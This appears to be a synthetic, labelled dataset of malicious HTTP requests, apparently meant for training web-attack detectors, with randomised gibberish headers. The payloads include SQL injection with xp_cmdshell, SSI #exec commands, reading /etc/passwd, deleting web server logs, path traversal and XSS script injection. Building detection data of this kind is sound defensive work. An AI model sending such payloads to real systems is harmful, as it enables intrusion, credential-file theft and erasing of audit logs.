Upgrade: L8ahqe/3.3, eola/5.9, onhrln/4.6, iticp/3.3, rnsA6/2.5
Warning: 992 www.tgxepEC.tiff "yer0iasse4hhsuslog" 
X-Serial-Number: 71827

null

End - Id: 42916
Start - Id: 41132
class: SqlInjection
GET /i_4I6/hN/gzJyk1sGknj0cNKA/8k744Tu_/vvp0UFiJcimyc/en.r5Yp22/axh/rmDnnlAA3dE/wEtn/dneaeLeepsSvszseD.shtml?zlmaLt0=Ihsr6ytnsabmedy&2h60NkOe2jP=P9Aincludeh-hroL&2txe=0deorIpnhnal9atnrcpr&pDaCxsih=iV6VB0&Q1deecnCarn=vrse%7Ehcid9&yGo=3&n68n=86410&e2m2luuo=%3Eaea+&rmel=httpsnbsswtn&eeta1rcUnrq=6612855&5wsot6Maucdst=%27%3BEXEC+master.dbo.xp_cmdshell+++++%27cmd.exe&sngSa=toteenr%27t HTTP/1.1
Host: www.paooetpe3e.biz
Connection: ghot
Accept: */*;q=0.6
Accept-Charset: euc-tw, euc-cn, big5, iso-8859-4
Accept-Encoding: 
Accept-Language: Rhsehti-ueeooe;q=0.6
Cache-Control: no-cache
Client-ip: 225.169.58.33
Cookie: gNhCqt2divshutdownVDO=ne5eaia5is6ricyr;tfssdniewbeg=ees(g eval/r;zyF1sm1J7=reelA\n;tu=Mre;lhRmm=sS84pn;b5b0TUat=gnxAOJrt8
Cookie2: $Version="3"
Date: Thu, 25 Feb 10 17:35:30 UTC
ETag: W/"VyKWI0nTnYyfdWi-YLN"
Expect: 100-continue
If-Modified-Since: Fri, 25 Mar 05 18:47:18 GMT
If-Unmodified-Since: Fri, 09 Apr 10 04:41:13 CET
If-Match: *
If-None-Match: "KbHTz5rmoZ8bzZnnF"
If-Range: *
Max-Forwards: 6451
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: odibel 3arthngL=ngnhea
Authorization: NTLM cmFmOUdsb2dscGNyNkNvbm9yZHJXd25taXBiN2R6b2VhUHBuRWU=
Referer: /tdbasiea.ace
TE: gzip;q=0.8
Trailer: If-Unmodified-Since
User-Agent: Mozilla/9.3 (compatible; Konqueror/2.5; Win 9x; naAux8et; ghtovm8at; 53me)
UA-CPU: 68000
UA-Disp: 152,2965,32
Via: 4.3 49.56.205.63, FTP/3.5 www.oniwp.tiff
Transfer-Encoding: deflate
Upgrade: is65/4.0, tshy/4.7
Warning: 198 130.0.9.220:076 "si9M9yfcee" 
X-Forwarded-For: 169.105.19.193
X-Serial-Number: 067866355817969470
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41132
Start - Id: 41909
class: SqlInjection
GET /hsmSpxealrHiserlmA/eWsPz2_NCrilDmtU1/rSoVIvcatMaAc/nfNncVePpV3.dll?ypj@Afi=oO25b1qQE&ewZiu5ia8ehto=++OR+++++2+++%3E++1 HTTP/1.0
Host: www.erx8l9r.uk:80
Connection: sAidrwaL
Accept: text/html;q=0.7
Accept-Charset: iso-8859-8;q=0.9, iso-2022-jp;q=0.6, iso-8859-1;q=0.3
Accept-Encoding: compress
Accept-Language: *
Cache-Control: no-cache
Client-ip: 199.227.44.84
Cookie: dna8=i;nacmPh9gn6tr=';AjvEvar=36335
Cookie2: $Version="2"
Date: Sat, 04 Nov 06 15:39:48 GMT
ETag: W/"0EKNpBL.NFJRNzsO.eU"
Expect: reyI=leeee
From: whodpi@rrheriuA.net
If-Modified-Since: Fri, 12 Mar 04 08:30:43 UTC
If-Unmodified-Since: Sat, 10 Nov 07 23:23:12 GMT
If-Match: "7k84Q-g8qC-HE-ARv"
If-None-Match: "t.FxVG.n7SP9q.4jm"
If-Range: Fri, 30 Sep 05 15:38:11 UTC
Max-Forwards: 95
MIME-Version: 4.7
Pragma: eoantyc='asuum7'
Proxy-Authorization: NTLM ZXI5aW5vc2VsdHJadGxldmVnYXJlZWFvYXVrczYxaXhPaXRlOA==
Authorization: NTLM TnR0Y2I2bm5kbG9tc2FlbHMwb2l1b3FsZGUzZXJhb25hc3NtZGphdWRhSXNlaXRu
Range: 301875-45,510153-7
Referer: /dreeqr.exe
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: toxrlcm/5.6.1.0
UA-CPU: MIPS
UA-Disp: 421,960,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9010x724
Via: FTP/7.2 www.Rsnie.shtml
Transfer-Encoding: compress
Upgrade: ejskmd/8.1, itcsut/3.9, ooo/5.9
Warning: 693 www.eetix.jpg "disicab5cesf" "Tue, 14 Aug 07 21:20:16 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41909
Start - Id: 49620
class: XPathInjection
GET /rmMt9boot.iniSQrE/Et9entex9avcshTaswen/eL4_i41jOI22/oosO/nAt-sl_Srkb/lzxTV8W/r.A-P_VpuDz/davntaeoanfrssALi.css?_g5k0q_5b=Di&f0fEtwemw=84bnO%25n6me&eN=owDYt&is2su=Ynprocessing-instructionxp_Nnrla+&k8MU858h8=sETl0vlwne&veiy5lgigld8b=le%27+++++or+++++1%3C++uryhoi%2FsNm5hr%2Fi%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D225%5D+++or++++%27Otaamx%27%3D+++%27&DhweO=eo HTTP/1.0
Host: 114.178.204.211
Connection: pict
Accept: application/*, video/mpeg
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: oysplea='l'
Client-ip: 230.240.19.221
Cookie: ejEH1Khttps=mcetf;SY.JJESw_pYu=bodycopy>d@;dia0lnywssE2ah=oo|;hiyF5iw=nqaw6nP-KBp;5ae=86otee;ee=DerssjdDo2ioAihtr
Cookie2: $Version="4"
Date: Tue, 23 Jun 09 13:44:39 UTC
ETag: "jpU_@AAdEv_vxVmKpNC"
Expect: 100-continue
From: ohbn1u@deeHtaer.ch
If-Modified-Since: Thu, 14 May 09 03:59:41 UTC
If-Unmodified-Since: Tue, 19 Apr 05 09:06:44 CET
If-Match: *
If-None-Match: *
If-Range: "9E2RCRc4yeL3usjC-bn"
Max-Forwards: 507
MIME-Version: 6.1
Pragma: Eu0Lp='r'
Proxy-Authorization: NTLM YmVuNjVoOXRhdHJlbmVkanNzYWhuY1Qzc1Nla3NvZW5obmh0
Authorization: sfrpr ieWiomau=srgl
Range: -18,783752-
Referer: /qten/nhi2/uarachTa/entEe/ohor.htm
TE: trailers,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/2.7 (Windows; U; Windows NT 8.3; eo-e8; rv:7.6.1) Gecko/96471632
UA-CPU: Sparc
UA-Disp: 198,0683,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3223x940
Via: 1.4 www.biek.tiff:3757, 2.6 www.tilkuh.html, HTTP/4.8 101.17.35.140
Transfer-Encoding: compress
Upgrade: vhimw/6.7, 66r/2.5, 07c/5.1, wa94/8.2
Warning: 750 www.Semo.html:72929 "jrrA0ies6s28ioso" 
X-Forwarded-For: 118.127.121.36
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49620
Start - Id: 40242
class: SSI
GET /nl_pOE/ciC63se0ovesle/UU/MLLvwgetLvbiUZVaF/xtbgsound-gLUhq1lOD_-/lYsePqYX/n5hIIn/saoaeMCerrda3.pl?evyAtttHn=%28m&tLhor9nya=159277988&Cel8=Tolog&iose8hrusd0etq=+nir&stqenitse=ishnoz HTTP/1.1
Host: www.iutae.cz
Connection: rgPcc
Accept: */*;q=0.7
Accept-Charset: macintosh;q=0.4, x-mac-greek;q=0.9, ks_c_5601-1987;q=0.9
Accept-Encoding: identity, compress, compress;q=0.4, deflate
Accept-Language: *;q=0.6
Cache-Control: no-transform
Cookie: 9Aloihoiukri=<!--    #exec     cmd="c:\progra~1\etnttcj\eteeek\srokin.exe    d:\ast\www.laorlenatr.org\OshTbhrgdl\database.mdb  /x  exporttofoxpro"-->
Date: Sun, 09 Dec 07 03:17:00 GMT
Expect: 0eluocaw
From: efge@a8tiatrT.fr
If-Unmodified-Since: Mon, 08 Oct 07 06:59:18 GMT
If-Match: *
If-Range: "x-RykklayoYIVj5Z1"
Max-Forwards: 880
Pragma: h3eilsh=ns2e9
Authorization: tedse ausoet=nttjT
Referer: http://eoh2.gov/dtfmhz.mspx
TE: trailers,chunked;q=0.1
Trailer: If-Match
User-Agent: Mozilla/6.0 (compatible; mteaoed; Win 9x; erml0)
Via: 0.3 www.AbfdstiT.css, 0.1 12.126.22.176
Upgrade: ho0w/5.3, Aimon/4.6
Warning: 957 www.oOs6.shtml "fEo1aaei" "Wed, 13 Apr 05 12:15:28 CET"

null

End - Id: 40242
Start - Id: 35704
class: XPathInjection
GET /shLGCU0DQ6r4.8xaja/rtOkMxeGN9Cv/so/tNvVoo2YjMuqK/l4wcCGXx2Q4o9h/cUUuVR@9YQl04sapj/iH5Ni/WtriLgYaiwWsystemd6/tth3Td8d47Pz08C/ubVZmj./uoo35TY8iNCgPNzWiW.jsp?KformYXQ0k=50++or++++1%3C++igfr%2Fv%2FoponU%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D99%5D+++or+++++9078%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&i3eqnee=7611743341&Ueao8r0eisisim=7800399 HTTP/1.0
Host: 203.237.204.69
Connection: close
Accept: audio/x-wav;q=0.9, video/quicktime;q=0.0
Accept-Charset: *
Accept-Encoding: identity;q=0.6, compress;q=0.8, gzip, gzip;q=0.3
Accept-Language: *
Cache-Control: max-stale=50570
Client-ip: 137.209.93.95
Cookie: l5updateMkL2oWk=oformg6U\;2Ncplov=7780890;kaMu=6q06lvF;es5eHehmirza6ce=49748812;rtnAnwi=686833
Cookie2: $Version="52"
Date: Sat, 02 Dec 06 24:28:06 CET
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: 100-continue
From: 0iiTea@WooaceteB.de
If-Modified-Since: Wed, 11 Jul 07 16:10:40 UTC
If-Unmodified-Since: Fri, 15 Sep 06 01:40:54 GMT
If-Match: "BMF6hLDOVgNnU1O7Vjw"
If-None-Match: "Flzf1U4IT.xEqpmp1ncI"
If-Range: *
Max-Forwards: 3119
MIME-Version: 3.9
Pragma: n9=8
Proxy-Authorization: ndsOth k8so=nlmc
Authorization: NTLM ZWtucHBJbW50dHN0YnJlZ2Nub3RpZUVjZXUyZGE5Zzh5c1I=
Range: 5225-,8-9,1-
Referer: /MrreaUsd/aarer/rrbo/Uselg/lxbNil.aspx
TE: chunked,deflate;q=0.6,deflate
Trailer: TE
User-Agent: Mozilla/7.5 (Machintosh; U; Mac OS X 4.2; ya-tr; rv:2.9.3) Gecko/93809870
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 656x763
Via: indgt/7.3 133.45.106.192
Transfer-Encoding: tScs
Upgrade: dOa8/7.7, iisei/3.4, ylle/7.0, laix/9.7, vbeu/5.2
Warning: 497 www.suB9rrh.png "orshmmmaTi2orsdnwe" "Sun, 22 Nov 09 02:52:27 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35704
Start - Id: 49910
class: XPathInjection
GET /edc2euen3ve/9easlfrLacou3a/umey1d/1USW8M0qrcpL/auJIroa_JTWd9bopen/6qVFoD/maq3cPatvtdekna1l/edyer8l/tVZQ3wgetAL/td0cyll5hrwihs54Np/rARR.gif?tenvhmtxbisak=lh+&Oqtiasoa=3&nyOevalm=640863129&orEYoueoth=zarvulGteSc&iia=at%27+++or+++6+++++%3C++++count%28path%2Fchild%3A%3A*%29+or++++%27ymeskrf%27++%3D+%27 HTTP/1.1
Host: www.baektontvu.com
Connection: close
Accept: video/quicktime, text/*, text/*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: dAn-RMh0, fn-wriet, hao8ma-e0g;q=0.0, s9woye5-lo, os-se3abe;q=0.6
Cache-Control: max-age=004
Client-ip: 107.232.49.49
Cookie: 9LtelnetdH=awnoehOs;_RPdb=an>ti);oecer=te%%o/laccepti7dsv;7oztri=altsee0wneRtr=8crw;Crgestte1edglj=c@S-wnTagit
Cookie2: $Version="34"
Date: Sat, 03 Feb 07 24:19:52 CET
ETag: "-PkzT_C75R64usx5m"
Expect: shiNeesn=gk8dcin
If-Modified-Since: Thu, 30 Jun 05 02:24:07 UTC
If-Unmodified-Since: Thu, 16 Sep 04 08:50:16 CET
If-Match: "VgRM.hzWFWwvjV@43"
If-None-Match: *
If-Range: "37q_00X1Gk@yBjxEQeY"
Max-Forwards: 19
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM d2Rha2V0dHZsd3NyZmVzc25Ub25jaW5lZGVrc3RvZWttckpFbmN1c2w=
Authorization: ia3b sara=5iwwpoh5
Range: 66338-
Referer: http://rW0O.net/rko4sr/glrs/ienoInh7/gtr6/xahav.exe
Trailer: Max-Forwards
User-Agent: nv3pK9do http://www.o2cstl.org
UA-CPU: MIPS
UA-Disp: 3308,0110,8
Via: 3.3 80.7.64.89, 6.5 www.oo6aobll.jpg
Transfer-Encoding: deflate
Upgrade: iEnTvf/9.1
X-Serial-Number: 2013029504
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49910
Start - Id: 43651
class: OsCommanding
PUT /vobddYsTWnuanAKX@YWb/P9orUHbY/iiclfe/e8arhcc/astoe/rKApUEBQhgzA89YMvzGg/hte0thmwod47itTb/osesosuxlfsotnaB/ngi4diiOy/Iexec.jpg? HTTP/1.1
Content-Length: 11
Content-Encoding: gzip
Content-Location: /k1p2/aatj/4E2I1H3z/OaOj/rcHn.mdb
Content-MD5: czZpT0F6Y3RldU1vaHRibg==
Content-Type: application/x-www-form-urlencoded
Host: www.pTmt.de
Connection: close
Accept: text/plain;q=0.0, text/*, image/*;q=0.2
Accept-Charset: euc-cn, windows-1254, cp-950;q=0.7
Accept-Encoding: compress, compress;q=0.1, compress
Accept-Language: *
Cookie: Setigmr=wPfndp71cdncibgyihail;h6otel7fpuedot=lSJz;eONw2L=<oetj;diau7jomllfta7R=| /bin/cat /etc/passwd%00.html;loe=Hlaitnoey0e9u]%Fpasswdg;teetdi=57265036
Date: Tue, 12 Dec 06 06:57:16 UTC
From: t0at@DA8r2hy.net
If-Unmodified-Since: Fri, 18 Dec 09 16:51:14 UTC
Max-Forwards: 6
Pragma: tfo='c'
Referer: /gtefs/aotned/ie9in2T/r9de0/tiszn.js
User-Agent: aKOrsS.Bi http://www.uWEsasdu.org
X-Forwarded-For: 79.207.152.133
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

LN1s=obTeae

End - Id: 43651
Start - Id: 41901
class: SqlInjection
GET /CcqservicesRlNINncphpp/nsC4RbReLSR7@dJ/1N.jpeg?Ez=tG11aV3.vwsv&GunNCoEG9eNC=vm&Hj6gmetaxlQbxL=nsor%3D&eqtpAStaoxiltoo=orth+&thsNDds=%27+%2B++%28+++++SELECT++TOP+++++1+Eoti+++++FROM+++no%29++%2B+++++%27&ldieceyM=%2Fe&E-Sx1MaN1position=vnhwTdlt&pwiO5fD9in=se8&hhf1=0&Naeaeaxtonuo0y=%3EyDbpfnednigs&y9QJLjlNf5rps=3Recrsaidhmn2s&decn1=659743&6nsgxkrae=r6zAuqp&Qpgaoalyn=1Y%40 HTTP/1.1
Host: www.itahmoefH.org
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=5
Client-ip: 199.227.44.84
Cookie: wealteldt=834051
Cookie2: $Version="384"
Date: Sat, 21 Mar 09 11:57:20 GMT
ETag: "ofotsShZb@38oZjIsB"
Expect: 100-continue
From: whodpi@rrheriuA.net
If-Modified-Since: Tue, 19 Jul 05 21:15:05 GMT
If-Unmodified-Since: Wed, 04 Jul 07 19:15:59 GMT
If-Match: "EUjR03G55pIl1cxiq"
If-None-Match: *
If-Range: Sat, 15 Nov 08 11:01:21 UTC
Max-Forwards: 4128
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: NTLM ZXI5aW5vc2VsdHJadGxldmVnYXJlZWFvYXVrczYxaXhPaXRlOA==
Authorization: Digest cnonce="rjl8"
Range: 814292-
Referer: http://roor.net/tjwe/nOtwtObf.mp3
TE: trailers
Trailer: Via
User-Agent: nsttgw/8.4.7.4
UA-CPU: MIPS
UA-Disp: 421,960,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 9010x724
Via: FTP/4.6 172.53.55.129, Oft/8.5 www.ooghtst9.tiff, FTP/5.5 96.241.196.77
Transfer-Encoding: compress
Upgrade: 9sH/0.7, h7C/7.3, a0w3h/0.4
Warning: 643 206.216.27.149 "suiowsouaeabcnttoryg" "Thu, 27 Oct 05 01:48:14 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41901
Start - Id: 45733
class: PathTransversal
GET /aawpiz/9is/Aiersuadoemth/leSnstlwadwmhOaisart/0satetcimosU/ewdar/2NetsAheaeualSercc/i-F0dW_TCPx/LPformFznMmobject.shtml?Tw=rscriptAhoh&Rri0aocsptrP=a%27replaceLggnd9%28%40&Feh1hCacw4jar=%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fasit%2Fitgear%2Fla%2Feniensre.bin&lii=7Sn8c3&eyke0itesl=cftareetg1domw&A-eBg0k2-=ogKA2v&xwie2nfpfeegae=iietia7cr&r46arwh=m&th=8p%3F%3Dl&ssl1rtarees=fWtCq&4vi=Msnma&rqezuatcibk=re3sngeotuqse&ckee8uw9n4iete7=u&pSsedmxri=txP&ewfyutadesehssi=tteibt HTTP/1.1
Host: www.Agbet.org:5443
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=64
Client-ip: 195.187.195.167
Cookie: trmhaen=cb
Cookie2: $Version="34"
Date: Sat, 23 Jan 10 04:37:21 GMT
ETag: W/"ZuZLKP3v5YD1lYXEqcG"
Expect: twlia9=reoe
From: tifPcn@leouSZ5u.net
If-Modified-Since: Sun, 22 Jun 08 19:33:06 CET
If-Unmodified-Since: Wed, 15 Oct 08 02:24:39 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 02 Aug 04 06:18:04 CET
Max-Forwards: 847
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: swjmRp fzc3=EdDtese
Authorization: Basic YTF0YmdGdjpoc211dA==
Range: -500252,934-3694
Referer: http://e24shed0.cz/2tnydsBv/soNye/t6rtanra/Ieiiys.exe
TE: chunked;q=0.2,trailers,trailers
Trailer: Via
User-Agent: Mozilla/6.3 (compatible; Konqueror/1.4; Solaris; sUEnlHs; iTlseqbhy)
UA-CPU: Sparc
UA-Disp: 3522,615,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 979x8035
Via: 8.2 234.125.69.23, 0.5 www.cne4s4.html
Transfer-Encoding: compress
Upgrade: eenmf/9.5, otosbe/8.3
Warning: 139 123.133.191.85 "aoRovfiyaetlwhiotHa" "Tue, 27 Apr 10 21:16:33 GMT"
X-Forwarded-For: 199.93.92.127
X-Serial-Number: 8691156680012
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45733
Start - Id: 39442
class: SSI
GET /hey/kJTKy-mym/hLq97.lp_oZ_.Eh8.exe?auheudanorpt=8883120&NbevalRWqu2htpassrO=laeeEltot1mo7ba4e&e8Tau=9898&uOee=597488&twhtNetno=18411&clhoxage=961&idhesaT=09785&diitAllrrtt=%3C%21--%23email+fromhost%3D%22www.asr1ein.com%22+tohost%3D%22mailbox.EweE.com%22+message%3D%22henPe+2cseCc+siessqh+rati%22+fromaddress%3D%229ungde.com%22+toaddress%3D%22ezlze.1er75.com%22+subject%3D%22Nxs%22+sender%3D%226e.com%22+replyto%3D%22tqbro.com%22+cc%3D%22al%22+inreplyto%3D%226lda+etr+e%22+id%3D%22rAnomail%22+--%3E HTTP/1.0
Host: www.Tienn.ch:80
Connection: YbIgb
Accept: image/png;q=0.4, video/quicktime
Accept-Charset: iso-2022-jp;q=0.5, windows-1252, x-mac-greek, cp-950
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 33.166.94.235
Cookie: 3vci=thdeaxtnre;yeow9ees=tesE eecnceel
Cookie2: $Version="2"
Date: Thu, 01 Dec 05 20:42:08 CET
ETag: W/"g-ksgTJnyj4@HQLJR7_n"
Expect: 100-continue
From: 1y6tgnnt@o4or4ie9a.com
If-Modified-Since: Tue, 21 Apr 09 01:31:15 GMT
If-Unmodified-Since: Tue, 17 Jul 07 24:34:46 CET
If-Match: *
If-None-Match: *
If-Range: "ghcvZRmM6m1@HUw4zXuo"
Max-Forwards: 151
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: rashN riiam=cssstki
Authorization: Basic dW9FcjphdnM3
Range: 73-4339,804-,5553-97644
Referer: /eahRslnq/tyes/Shco/xeeYT.asp
TE: deflate;q=0.4,deflate,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.2 (Windows; U; Windows NT 0.6; ne-on; rv:1.3.1) Gecko/33307033
UA-CPU: Sparc
UA-Disp: 9324,2062,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 015x2523
Via: HTTP/0.3 www.rgkssor.tiff, rhhon/2.6 69.238.197.202, 1.9 35.54.23.209
Transfer-Encoding: identity
Upgrade: ear/4.1, oih/5.2, gul/0.6, hfwn/8.3, moos/5.6
Warning: 428 www.oheYza.htm "hrtat8k" "Sat, 01 Oct 05 21:42:07 CET"
X-Forwarded-For: 250.217.107.185
X-Serial-Number: 298841177786
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39442
Start - Id: 43325
class: OsCommanding
GET /xP2Twget_5/iKPey.Yf8CcH/zhtteEq/esnihdrihdwerAeihdvs/rsBIzheleGn/oupcvMnMddfihonpwdo/dahnoUfsLr/n0@uxWqL6-ZH710P3.js?niisEMldh9usSrt=67765&rm2ML=btmpn&Zconnect@Z=kGCzq3Lk1&ae49uds2ws=%3EEch1emailIlkt&iattg0tho=t9B_yDFQ6&uote=%250arm++-f++%2Fvar%2Flog%2Fhttpd%2Faccess_log++++%3B&dnzzpotr=%295uai&yi1o0rts42=ri4l&e2tAli=h+uimgi&Mshutdownvars=script%29csam&ibuodeapfsn=n-o HTTP/1.1
Host: 88.80.102.190:80
Connection: close
Accept: image/*, application/rtf, video/*;q=0.2
Accept-Charset: iso-2022-jp, x-mac-greek;q=0.6, utf-8, iso-2022-kr;q=0.1, x-mac-japanese;q=0.3
Accept-Encoding: *;q=0.9
Accept-Language: o-hd4k2;q=0.7
Cache-Control: se0hida=no0k
Client-ip: 86.69.183.54
Cookie: tam8paOmeIda=ai60zE;ezracUa=e90me;rtmp7PPSgB=nWatNmlaial;nxeqnH1i=istHsdivR;toljiao207pa=1008815205
Cookie2: $Version="3"
Date: Thu, 21 Jun 07 04:11:56 GMT
ETag: "L6Op1aeDmT9K1KLGR"
Expect: 100-continue
From: eTnr@war0.be
If-Modified-Since: Thu, 08 Jan 09 08:45:51 GMT
If-Unmodified-Since: Tue, 02 Dec 08 22:59:24 GMT
If-Match: "i6TkusYWAoxyKXQgsf"
If-None-Match: "D4fZ-V7Uwe-IdHIm"
If-Range: Thu, 29 Apr 10 20:00:33 GMT
Max-Forwards: 199
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: NTLM aXlCUG5Zbm5ybXJ0aUZ6dG85SXdlaGVmZ2ZkaXVhZ2Rkdnlpb25saGJL
Authorization: eDloa hhEAnpe=aemiftda
Range: 2030-1
Referer: /zbmsH5de/t7Ldte/strdfycs.swf
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: Mozilla/5.0 (X11; U; Linux i586 3.8; d3-bo; rv:9.3.4) Gecko/51389617
UA-CPU: 68000
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: 2.0 www.htoe.gif, FTP/3.5 26.51.52.189
Transfer-Encoding: identity
Upgrade: s6hdl/7.5, 6rdns/6.0, wt2/7.2, trtfwt/0.2, z5mi/7.4
Warning: 213 www.e6ttha.html:3574 "evi1u0aas9lO3ep" 
X-Forwarded-For: 213.135.117.46
X-Serial-Number: 356926769417178111
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43325
Start - Id: 46700
class: XSS
GET /mm2VaYDBS5EPk0HndX1g/bpn/q2nc9kl.-in/dlOoQNfkxq.cgi?sihL4=tlr5ehetcsneg+%5C+e%2Fp&n1ehnfezsotepa=%3Cewget%24e%2Fhxet&dlilta=1210&nipyuoHTkoardu=150460&oe=+hsnnlHehAlwputec&8Zn_=aKr_hRIC HTTP/1.0
Host: www.tdamaEsP.uk
Connection: close
Accept: audio/*;q=0.4, video/mpeg, image/jpeg;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: n-iomuzbn6, nEW-ury, aNonnr-deiih
Cache-Control: max-stale
Client-ip: 194.31.187.100
Cookie: 2ctoob=<!-- -- --><script   >[alert('4hs6Vtep2');]</script ><!-- -- -->
Cookie2: $Version="000"
Date: Sat, 22 Dec 07 21:31:05 UTC
ETag: W/"brH8Xc_QOwh1tFEjJ175"
Expect: Rcudeep=ohiaow
From: sydmNoRr@eYicvet9.com
If-Modified-Since: Wed, 17 Jun 09 08:53:21 CET
If-Unmodified-Since: Fri, 11 Nov 05 09:33:18 CET
If-Match: "iWBRTxdiDG04m44KDJfT"
If-None-Match: *
If-Range: Thu, 01 Oct 09 12:40:13 GMT
Max-Forwards: 34
MIME-Version: 7.6
Pragma: on='tezaTih'
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest algorithm=cE8srfTv
Range: 4-54,2486-,676-7316
Referer: http://www.llnsll8.it/y6tee/rizrhya.bin
TE: trailers
Trailer: Accept-Charset
User-Agent: a.kYCwR3 http://www.tpt7e.ch
UA-Disp: 240,199,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 007x164
Via: 7.4 www.iyojq.htm, hh5Oy/2.5 www.hedqmd.html:47, HTTP/2.6 222.53.12.202
Transfer-Encoding: deflate
Upgrade: oa7ner/6.8, tdsyot/0.1, lom/8.5
Warning: 710 244.32.72.52 "phsreeteta" "Fri, 24 Feb 06 09:05:16 CET"
X-Forwarded-For: 254.88.178.244
X-Serial-Number: 9170068717
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 46700
Start - Id: 47919
class: XSS
GET /7.imgaa/0-/npoachazhhozri/lca1/vF3L/dW5@CP/uii3ntrsI5f/Ax/tWGxqT_L7./9w5BdghavingjW.shtml?oshitft=n%2BYe1&eoeefnaeslin=+eprrenmidtdigx&Bresmera=dej3oHthaSaaowT&t2na=lo%25eon4systemss&0ieihn3A=reegEts&ielahFd=3rlLnQ.QLV&pot8swauESnFh=ja6s2u&9dUou=7D&nwzmeSuzleewvs=hIv&uae=%3Cdiv+++++style+%3D++%22++behaviour%3A++url%28%5Bhttp%3A%2F%2Fwww.ilge.com%2Fscript%2FafttnHFg.mdb%5D%29%3B++++%22+++%3E&os9oJarTiepmi=aeextermee&rN1nljeoTTii65=105000&Taoy7dhenrnh=r3Y0j5GB3BE6&dyZrcb1t=d_lIm HTTP/1.1
Host: www.Olaxsp.ch
Connection: sLh2mwA
Accept: image/png, audio/x-wav;q=0.3
Accept-Charset: hz-gb-2312, iso-8859-8-i, windows-1250;q=0.8
Accept-Encoding: deflate, gzip, gzip;q=0.7, identity, identity
Accept-Language: itbsAS5-sbtemtn4, roid0cs-jt;q=0.2, me-hhh;q=0.4, eeyov1-eird5r;q=0.9, hn7f-drsdi
Cache-Control: no-cache
Client-ip: 249.54.30.10
Cookie: 7FUacceptxQwWmzo=wd6f25Ij0p;i5wemclsid1aosI=<aeaapshttpaeyIwnthe;7Y46wZk=i0n
Cookie2: $Version="20"
Date: Wed, 24 Dec 08 13:52:48 CET
ETag: W/"FxFIMkqEChMJ8o8cBQ"
Expect: miJlaez
From: ayedann@u5os6hn.st
If-Modified-Since: Tue, 01 Sep 09 11:55:50 UTC
If-Unmodified-Since: Sat, 09 Jan 10 08:14:47 GMT
If-Match: "T2qHObVWQXwPwDGQykRn"
If-None-Match: *
If-Range: Sat, 21 Apr 07 12:52:03 GMT
Max-Forwards: 272
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: acdd pntas=drlmae
Authorization: teeo iilng=ibotOre
Range: 16-10857
Referer: http://www.k6lhrrs.com/elti/dzh51/ndeso3me/oaoo0uoo.swf
TE: gzip,deflate;q=0.2,trailers
Trailer: If-Range
User-Agent: unriEcFd/8.5.6
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 229x467
Via: 2.7 223.182.232.86, 4.8 www.2u4r0t.jpg, HTTP/7.7 61.176.186.103
Transfer-Encoding: compress
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 832 www.gaeRu.html "xsaazKzls" 
X-Forwarded-For: 90.98.250.32
X-Serial-Number: 03181480810
----: --------------------------------------------------
